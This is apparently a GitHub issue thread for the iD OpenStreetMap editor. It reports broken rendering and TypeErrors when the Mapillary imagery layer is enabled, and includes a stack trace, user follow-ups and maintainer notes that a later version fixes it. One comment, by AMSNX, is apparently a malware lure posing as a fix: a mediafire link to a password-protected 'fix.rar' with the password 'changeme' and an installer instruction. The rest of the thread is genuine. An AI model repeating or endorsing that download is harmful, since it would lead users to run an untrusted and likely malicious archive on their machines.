### ISSUE TITLE
Data load/refresh issue with Mapillary imagery layer enabled

### ISSUE THREAD

**Issue by tohaklim** [openstreetmap/iD#10440]
I've not seen this in the issues log, but surely it can't be just me?
### How to reproduce the issue?

Not able to reproduce reliably, but in general.
1. Open an editing session
2. Enable the Mapillary layer
3. (potentially) select an image
4. Attempt to edit tags or move/zoom the map
5. Tags get added however the tag list is not updated until exited
6. Map view attempts to move/zoom however rendering gets borked (see screenshot) - data and imagery layers become misaligned; console is full of uncaught typeErrors: cannot read properties of undefined
7. Disabling the Mapillary layer fixes the issue

### Screenshot(s) or anything else?

![image](https://github.com/user-attachments/assets/dfb705c1-ae49-4258-a870-8025de41b8f8)

`Uncaught TypeError: Cannot read properties of undefined (reading 'transient')
    at bd.extent (id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:59:13318)
    at id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:20:5711
    at Array.map (<anonymous>)
    at o (id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:20:5701)
    at o (id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:20:6640)
    at id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:20:8316
    at Cn.call (id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:37:6263)
    at a.gatherStats (id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:19:9065)
    at a (id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:19:21910)
    at u (id-316f4f96984fe6c0b21f27749e1fbd4cc99fcfe00db1c03f2f26c6f225823141.js:19:24770)`

### Which deployed environments do you see the issue in?

Released version at openstreetmap.org/edit

### What version numbers does this issue effect?

2.30.2

### Which browsers are you seeing this problem on?

Microsoft Edge

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by danieldegroot2** [comment]
It should work if you try the development version at https://ideditor.netlify.app/
This will be available on the openstreetmap.org website at a later time.

Duplicate of #10417.

**Comment by EwenH** [comment]
Hi @danieldegroot2 and @tohaklim, thanks for posting and updating this however in 2.30.4, we are still experiencing this undocumented feature and is now possibly a more consistently poorer experience than the original bug and has made editing with  Mapillary impracticable, taking three times to do the same type of editing when it is functioning correctly. Is there an update on this please?

I find that I want to add a water tank or building and that the Q key to square doesn't work, nor can I select the new rectangle as a house or building from the standard left hand object navigation without turning Mapillary off. Creating a water tank from a triangle and then using the O key to make it a circle comes up with some really weird stuff, weirder than day four of the original Woodstock with multiple "Two points in Area are very close together". 

![image](https://github.com/user-attachments/assets/6dc0946b-64a4-4222-8173-d49e28c12951)

![image](https://github.com/user-attachments/assets/7e57e453-db56-43dd-a2af-f56025d38ca5)

**Comment by tyrasd** [comment]
this is most likely fixed in v2.31
